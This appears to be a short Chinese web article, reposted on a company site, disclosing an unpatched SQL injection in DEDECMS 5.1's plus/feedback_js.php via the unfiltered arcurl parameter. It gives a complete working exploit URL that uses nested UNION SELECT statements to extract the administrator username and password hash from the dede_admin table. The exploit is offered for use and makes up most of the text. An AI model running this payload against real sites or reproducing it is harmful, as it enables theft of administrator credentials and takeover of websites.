DEDECMS 5.1 feedback_js.php 0DAY
这个漏洞是我和Rainy'Fox一起发现的

同样是在magic_quotes_gpc=off的情况下可用
漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl
看一下利用方法吧,嘿,为了闭合我用了两次union
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
【编辑推荐】
- 重新审视企业IPS的应用:防御SQL注入攻击的利剑
- SQL注入攻击及其防范检测技术研究
- 安全技巧:学会检查SQL注入式攻击漏洞
文章名称:DEDECMS 5.1 feedback_js.php 0DAY
文章路径:http://www.jxjierui.cn/article/cdihish.html


咨询
建站咨询
